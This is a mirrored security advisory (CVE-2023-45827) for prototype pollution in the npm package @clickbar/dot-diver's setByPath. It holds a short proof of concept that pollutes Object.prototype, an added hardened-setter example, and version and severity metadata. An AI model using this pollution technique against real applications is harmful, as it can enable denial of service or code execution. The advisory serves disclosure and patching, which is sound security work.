Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS05dzVmLW13M3AtcGo0N84AA26p
Prototype Pollution(PP) vulnerability in setByPath
Summary
There is a Prototype Pollution (PP) vulnerability in dot-diver. It can lead to RCE.
Details
//https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277
// eslint-disable-next-line @typescript-eslint/no-unsafe-member-access
objectToSet[lastKey] = value
In this code, there is no validation against Prototype Pollution.
PoC
import { getByPath, setByPath } from '@clickbar/dot-diver'
console.log({}.polluted); // undefined
setByPath({},'constructor.prototype.polluted', 'foo');
console.log({}.polluted); // foo
Impact
It is Prototype Pollution (PP), and it can lead to DoS, RCE, etc.
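The missing validation described under Details, shown as an added example: this is not dot-diver's code or its actual patch. `safeSetByPath`, `FORBIDDEN_KEYS` and `demo` are hypothetical names, and creating missing intermediate objects is an assumption of this sketch.

```javascript
// Added example: a hypothetical hardened path setter, not dot-diver's implementation.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function safeSetByPath(target, path, value) {
  const keys = path.split('.');
  // Validate the whole path first so a rejected write leaves no partial state.
  for (const key of keys) {
    if (FORBIDDEN_KEYS.has(key)) {
      throw new TypeError(`unsafe key "${key}" in path "${path}"`);
    }
  }
  let current = target;
  for (const key of keys.slice(0, -1)) {
    // Follow own properties only; never descend into anything inherited
    // from Object.prototype (for example "toString" or "valueOf").
    if (!Object.prototype.hasOwnProperty.call(current, key)) {
      current[key] = {}; // assumption: missing intermediates are created
    } else if (current[key] === null || typeof current[key] !== 'object') {
      throw new TypeError(`cannot descend into non-object at "${key}"`);
    }
    current = current[key];
  }
  current[keys[keys.length - 1]] = value;
  return target;
}

// Constructed inputs: the PoC path from this advisory, a __proto__ variant,
// and a benign nested path.
function demo() {
  const paths = ['constructor.prototype.polluted', '__proto__.polluted', 'a.b.c'];
  const results = paths.map((path) => {
    try {
      safeSetByPath({}, path, 'foo');
      return [path, 'written'];
    } catch (err) {
      return [path, 'blocked'];
    }
  });
  // A fresh object must not have gained a "polluted" property.
  return { results, polluted: {}.polluted };
}

console.log(demo());
```
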
Credits
Team : NodeBoB
최지혁 ( Jihyeok Choi )
이동하 ( Lee Dong Ha of ZeroPointer Lab )
강성현 ( kang seonghyeun )
박성진 ( sungjin park )
김찬호 ( Chanho Kim )
이수영 ( Lee Su Young )
김민욱 ( MinUk Kim )
Permalink: https://github.com/advisories/GHSA-9w5f-mw3p-pj47
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05dzVmLW13M3AtcGo0N84AA26p
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: about 1 year ago
Updated: about 1 year ago
CVSS Score: 7.3
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
EPSS Percentage: 0.00533
EPSS Percentile: 0.77664
Identifiers: GHSA-9w5f-mw3p-pj47, CVE-2023-45827
References:
- https://github.com/clickbar/dot-diver/security/advisories/GHSA-9w5f-mw3p-pj47
- https://github.com/clickbar/dot-diver/commit/9790834cf4c2bca75db00e588e58056dacaf602f
- https://nvd.nist.gov/vuln/detail/CVE-2023-45827
- https://github.com/clickbar/dot-diver/commit/98daf567390d816fd378ec998eefe2e97f293d5a
- https://github.com/advisories/GHSA-9w5f-mw3p-pj47
Blast Radius: 0.0
Affected Packages
npm:@clickbar/dot-diver
Dependent packages: 2
Dependent repositories: 1
Downloads: 1,238 last month
Affected Version Ranges: < 1.0.2
Fixed in: 1.0.2
All affected versions: 1.0.0, 1.0.1
All unaffected versions: 1.0.3, 1.0.4, 1.0.5, 1.0.6, 1.0.7, 2.0.0